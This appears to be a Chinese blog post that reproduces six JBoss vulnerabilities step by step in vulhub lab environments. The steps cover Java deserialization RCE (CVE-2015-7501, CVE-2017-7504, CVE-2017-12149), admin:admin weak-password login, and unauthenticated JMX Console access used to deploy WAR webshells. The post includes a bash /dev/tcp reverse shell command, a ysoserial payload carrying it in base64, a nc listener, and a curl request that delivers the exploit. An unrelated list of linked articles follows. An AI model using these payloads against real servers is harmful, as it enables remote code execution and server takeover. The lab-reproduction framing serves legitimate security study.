常见中间件漏洞(三、Jboss合集)

ops/2024/10/19 1:29:16/

目录

Jboss-toc" style="margin-left:0px;">三、Jboss

Jboss%E4%BB%8B%E7%BB%8D-toc" style="margin-left:40px;">Jboss介绍

3.1 CVE-2015-7501

漏洞介绍

影响范围

环境搭建

漏洞复现

3.2 CVE-2017-7504

漏洞介绍

影响范围

环境搭建

漏洞复现

3.3 CVE-2017-12149

漏洞简述

漏洞范围

漏洞复现

3.4 Administration Console弱囗令

漏洞描述

影响版本

环境搭建

密码文件

漏洞复现

3.5 低版本JMX Console未授权

漏洞描述

影响范围

环境搭建

漏洞复现

3.6 高版本JMX Console未授权

漏洞描述

影响版本

环境搭建

漏洞复现


Jboss" style="margin-left:0px;text-align:justify;">三、Jboss

Jboss%E4%BB%8B%E7%BB%8D" style="margin-left:0px;text-align:justify;">Jboss介绍

JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发这使得JBoss广为流行。

3.1 CVE-2015-7501

Jboss JMXInvokerServlet 反序列化漏洞

漏洞介绍

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象然后我们利用Apache Commons Collections中的 Gadget 执行任意代码

影响范围

JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0 CP10

JBoss AS (Wildly) 6 and earlierJBoss A-MQ 6.2.0

JBoss Fuse 6.2.0

JBoss SOA Platform(SOA-P) 5.3.1

JBoss Data Grid (JDG) 6.5.0

JBOSS BRMS (BRMS) 6.1.0

JBOSS BPMS (BPMS) 6.1.0

JBoss Data Virtualization (JDV) 6.1.0

JBoss Fuse Service Works (FSW) 6.0.0

JBoss Enterprise Web Server(EWS) 2.1,3.0

环境搭建
cd vulhub/jboss/JMXInvokerServlet-deserializationdocker-compose up -d

漏洞复现

1.POC,访问地址

http://47.99.98.0:8080/invoker/JMXInvokerServlet

返回如下,说明接口开放,此接口存在反序列化漏洞

2.下载 ysoserial 工具进行漏洞利用

https://github.com/frohoff/ysoserial

将反弹shell进行base64编码

bash -i >& /dev/tcp/47.99.98.0/7777 0>&1

java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45OS45OC4wLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}">exp.ser

3.服务器设置监听得端⼝

nc -lvvp 7777

4.执行命令

curl http://47.99.98.0:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

5.反弹成功

3.2 CVE-2017-7504

JBossMQ JMS 反序列化漏洞

漏洞介绍

JBoSS AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerlLServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码执行

影响范围

JBoss 4.x 以及之前的所有版本

环境搭建
cd vulhub/jboss/CVE-2017-7504docker-compose up -d

漏洞复现

1.访问漏洞地址

http://47.99.98.0:8602/jbossmq-httpil/HTTPServerILServlet

​python jexboss.py -u http://47.99.98.0:8602/

3.3 CVE-2017-12149

JBoss 5.x/6.x反序列化漏洞

漏洞简述

该漏洞为 Java反序列化错误类型,存在于 Jboss的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞

漏洞范围

JBoss 5.x/6.x

cd vulhub/jboss/CVE-2017-12149

docker-compose up -d

漏洞复现

1.访问漏洞页面,看jboss版本

http://47.99.98.0:8603/

2.验证是否存在漏洞,访问

http://47.99.98.0:8603/invoker/readonly

该漏洞出现在/invoker/readonly中 ,服务器将用户post请求内容进行反序列化

返回500,说明页面存在,此页面存在反序列化漏洞

3.使用工具进行检测 DeserializeExploit 如果成功直接上传webshell即可:工具:

https://github.com/yunxu1/jboss-_CVE-2017-12149

3.4 Administration Console弱囗令

漏洞描述

Administration Console管理页面存在弱口令,`admin:admin`.登陆后台上传war包,getshell

影响版本

全版本

环境搭建

因为这里用的环境是CVE-2017-12149的靶机

cd vulhub/jboss/CVE-2017-12149

docker-compose up -d

密码文件
/iboss-6.1.0.Final/server/default/conf/props/imx-console-users.properties

账户密码:admin:vulhub

漏洞复现
http://47.99.98.0:8603/admin-console/login.seam?conversationld=4

1.登录后台,点击web应用

admin vulhub

2.上传后门shell.war

3.连接WebShell

http://47.99.98.0:8603/test/1.jsp

3.5 低版本JMX Console未授权

低版本JMX Console未授权访问Getshell

漏洞描述

此漏洞主要是由于JBoss中/imx-console/HtmIAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进入到 jmx控制台,并在其中执行任何功能。

影响范围

Jboss4.x以下

环境搭建
cd vulhub/jboss/CVE-2017-7504docker-compose up -d

漏洞复现

1.访问

http://47.99.98.0:8602/jmx-console/

2.这里我们使用得复现环境不存在,所以需要密码(正常环境无需密码直接可进入)

admin admin

3.然后找到jboss.deployment (jboss 自带得部署功能)中的flavor=URL,type=DeploymentScanner点进去(通过URL的方式远程部署)

4.找到页面中的void addURL()选项远程加载war包来部署

 

5.制作war包,这里用之前制作好的test.war,填写war包远程地址

http://47.99.98.0/test.war

6.然后跳转以下页面

7.webshell连接

http://47.99.98.0:8602/test/1.jsp

pass

3.6 高版本JMX Console未授权

漏洞描述

JMX Console默认存在未授权访问,直接点击JBoss主页中的 JMX Console 链接进入JMX Console页面,通过部署war包,getshell

影响版本

Jboss6.x以下

环境搭建
cd vulhub/jboss/CVE-2017-12149docker-compose up -d

漏洞复现
http://47.99.98.0:8603/jmx-console

因为使用环境不存在该漏洞所以需要输入账户密码:admin vulhub

1.本地搭建部署点

在JMX Console页面点击jboss.system链接,在Jboss.system页面中点击service=MainDeployer,如下

2.进入service=MainDeployer页面之后,找到methodindex为17或19的deploy 填写远程war包地址进行远程部署

3.搭建远程部署,部署远程war包地址

4.然后输入lnvoke

http://47.99.98.0/test.war

点击Invoke

5.连接Webshel

http://47.99.98.0:8603/test/1.jsp

pass


http://www.ppmy.cn/ops/90122.html

相关文章

C++ 指针和引用的区别?

C中指针和引用的区别? 指针是一个变量,其指向一个地址,本身也占用内存;引用只是个原变量别名,本身不占用内存。指针可以为空,并且可以改变指向;而引用必须初始化且不能再改变。sizeof函数作用于…

peotry

简介 peotry可以进行依赖管理(支持锁定版本)、虚拟环境管理,可以处理复杂的依赖关系和版本冲突,简化构建和发布。 相对pip的优势:能解决版本冲突,移除某个组件会把相关依赖都移除,pip只会移除本…

RF放大器(传输线+终止传输线+奥品电路中常见问题+调谐放大器)

2024-8-6,星期二,22:57,天气:晴,心情:晴。下班抽出点时间看看书,话不多说,学习开始啦。 今日继续学习模电自选教材的第六章,多级放大器、RF放大器和功率放大器。主要学习…

C++ 几何算法 - 向量点乘,叉乘及其应用

一:点乘介绍 1. 向量点乘: 2. 向量点乘的性质: 3. 向量点乘公式: 4. 向量的点乘的属性: (1):向量与自身做点乘,会得到向量长度的平方: (2&#xf…

excel中有些以文本格式存储的数值如何批量转换为数字

一、背景 1.1 文本格式存储的数值特点 在平时工作中有时候会从别地方导出来表格,表格中有些数值是以文本格式存储的(特点:单元格的左上角有个绿色的小标)。 1.2 文本格式存储的数值在排序时不符合预期 当我们需要进行排序的时候…

Nginx自动安装配置脚本

一、Nginx介绍 Nginx 是一个流行的开源 Web 服务器软件。它最初由 Igor Sysoev 开发,并于 2004 年首次发布。 Nginx的 目标是提供高性能、高可靠性和低内存消耗的 Web服务器,同时也可以用作反向代理服务器和负载均衡器。 Nginx 以其优越的性能和高度可…

《学会 SpringMVC 系列 · 参数解析器 ArgumentResolvers》

📢 大家好,我是 【战神刘玉栋】,有10多年的研发经验,致力于前后端技术栈的知识沉淀和传播。 💗 🌻 CSDN入驻不久,希望大家多多支持,后续会继续提升文章质量,绝不滥竽充数…

前端八股速通(持续更新中...)

1、深拷贝和浅拷贝的区别 浅拷贝:浅拷贝是拷贝一层,引用类型共享地址。 如果属性是基本类型,拷贝的就是基本类型的值。 如果属性是引用类型,拷贝的就是内存地址。 意思是,当进行浅拷贝时,对于对象的每一…